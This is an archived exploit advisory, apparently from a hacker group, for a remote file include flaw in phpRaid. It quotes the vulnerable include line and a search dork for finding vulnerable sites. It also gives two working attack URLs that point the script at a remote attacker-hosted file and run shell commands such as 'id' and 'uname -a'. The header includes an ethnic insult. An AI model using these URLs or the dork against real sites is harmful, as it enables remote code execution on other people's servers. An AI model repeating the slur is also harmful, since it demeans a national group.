TUCoPS :: Web :: PHP :: b06-2076.htm

phpRaid Remote File Include
phpRaid Remote File Include
phpRaid Remote File Include 


# Kurdish Security Advisory =0D
# phpRaid Remote File Include [SMF] :}=0D
# "Sosyalizim'de ısrar insan olmakta ısrardır" Abdullah Ocalan=0D
# Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & botan@linuxmail.org=0D 
# Risk : High=0D
# Class : Remote=0D
# Script : phpRaid =0D
# Script Website : http://www.spiffyjr.com=0D 
# Version : phpRaid v2.9.5=0D
" v3.0.b1=0D
" v3.0.b2=0D
" v3.0.b3=0D
=0D
# Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, And Kurdish Hackers and Security Guards :D =0D
# Special Bastard : Turkish Lame=0D
=0D
# w0rkz : "phpRaid" "inurl:"phpRaid" etc. :)=0D
=0D
---------------------------------------------------------------------=0D
=0D
# cmd shell example: =0D
# cmd shell variable: ($_GET[cmd]);=0D
=0D
Vulnerable code : Now SMF portal code :)=0D
=0D
=0D
// includes =0D
include($smf_root_path= . 'SSI.php');=0D
-----------------------------------------------------------------------=0D
=0D
http://www.site.com/[phpraidpath]/auth/auth.php?smf_root_path=http://www.yourcode.com/x.txt?&cmd=id=0D 
=0D
http://www.site.com/[phpraidpath]/auth/auth_SMF/smf_root_path=http://www.yourcode.com/x.txt?&cmd=uname -a

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH